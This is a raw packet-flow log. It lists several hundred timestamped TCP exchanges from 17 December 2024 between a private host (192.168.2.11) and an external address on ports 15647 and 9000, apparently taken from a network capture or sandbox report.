Dec 17, 2024 08:40:33.571037054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.575884104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.582726955 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.583908081 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.583973885 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.584013939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.584036112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.589200020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.591869116 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.608798981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.608845949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.608983994 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.616305113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.618884087 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.629771948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.634222984 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.634243011 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.634350061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.648052931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.651910067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.660697937 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.661145926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.661175966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.661267042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.664212942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.664273024 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.676600933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.677928925 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.693886042 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.693924904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.693972111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.703715086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.704080105 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.705271959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.705298901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.705343008 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.727940083 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.728027105 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.733486891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.733592987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.757693052 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.763003111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.763077021 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.781039953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.781092882 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.787609100 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.787705898 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.800800085 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.800915956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.820637941 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.825740099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.825838089 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.825925112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.825982094 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.826107979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.853327990 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.853523970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.856106997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.856180906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.856183052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.858974934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.859011889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.859035969 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.877661943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.877743006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.896661997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.896711111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.896742105 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.901005983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.901051998 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.901103020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.902450085 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.902597904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.903891087 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.903958082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.920648098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.920707941 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.920993090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.921271086 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.932081938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.932146072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.938786030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.938853025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.938910961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.940504074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.945883036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.945941925 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.964173079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.964613914 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.968996048 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.969023943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.969050884 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.973436117 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.974082947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.974190950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.978729963 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.992357016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.995835066 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.015883923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.015959024 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.015985012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.020771027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.020857096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.023627996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.023685932 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.037801027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.037858963 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.037899971 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.041059017 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.041126013 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.045552969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.045600891 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.058685064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.058764935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.070024967 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.070139885 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.088721991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.088792086 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.093034029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.093045950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.093094110 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.130558014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.130840063 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.137994051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.138060093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.143492937 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.160902977 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.160995007 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.165448904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.179819107 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.179869890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.179898024 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.200014114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.200047016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.200103045 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.212929964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.213002920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.213083029 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.225474119 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.225497961 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.225544930 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.250895023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.250992060 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.258367062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.258433104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.262695074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.262733936 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.262809038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.280817986 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.280883074 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.297117949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.297183037 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.297198057 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.320076942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.320168018 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.320539951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.320580006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.320586920 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.320642948 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.338469982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.338501930 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.338591099 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.349944115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.356309891 CET	9000	50059	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.356328964 CET	9000	50059	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.356389046 CET	50059	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.356487989 CET	50059	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.378518105 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.378582954 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.382162094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.382220984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.382236004 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.391751051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.391844988 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.400840044 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.400911093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.417509079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.417546988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.417593956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.441750050 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.442857981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.461679935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.471337080 CET	50060	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.473129034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.473166943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.473267078 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.476152897 CET	9000	50059	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.491930962 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.495348930 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.495420933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.495476007 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.502041101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.512248039 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.515881062 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.535059929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.537533998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.539872885 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.561567068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.561615944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.564093113 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.581607103 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.581906080 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.591063976 CET	9000	50060	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.592958927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.592972994 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.593127012 CET	50060	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.593847036 CET	50060	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.593846083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.615338087 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.616092920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.616161108 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.616295099 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.652416945 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.654890060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.658483028 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.659878969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.659944057 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.681456089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.682038069 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.683836937 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.683938026 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.704034090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.704113007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.704262972 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.713609934 CET	9000	50060	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.730489016 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.736115932 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.736279964 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.737684965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.737711906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.737756014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.768929005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.772524118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.772604942 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.779823065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.779999018 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.803548098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.824115992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.824209929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.828016043 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.828099966 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.850426912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.851070881 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.857464075 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.857517004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.858297110 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.858403921 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.858442068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.858470917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.888978004 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.889121056 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.899507999 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.899569035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.899575949 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.905936003 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.906006098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.906105042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.923470020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.923551083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.928385019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.928431034 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.932750940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.932799101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.932847977 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.947810888 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.950140953 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.970521927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.970596075 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.972856998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.972897053 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.972965002 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:34.994056940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:34.995110989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.019296885 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.019887924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.019953966 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.020047903 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.020629883 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.026566029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.026638985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.026809931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.050286055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.050388098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.069889069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.070843935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.081223011 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.081317902 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.092417955 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.092554092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.092669010 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.097902060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.097961903 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.098130941 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.116166115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.118643045 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.136513948 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.147259951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.147335052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.147461891 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.164777994 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.173856974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.174005032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.174138069 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.194420099 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.201934099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.202044010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.202199936 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.212626934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.215878963 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.217806101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.217976093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.218024969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.218081951 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.235220909 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.235601902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.238434076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.239887953 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.256412983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.257941008 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.276125908 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.276210070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.276410103 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.282783031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.282829046 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.282962084 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.284693003 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.285960913 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.289988995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.290079117 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.307363033 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.307380915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.307461023 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.314387083 CET	15647	50034	92.255.57.75	192.168.2.11
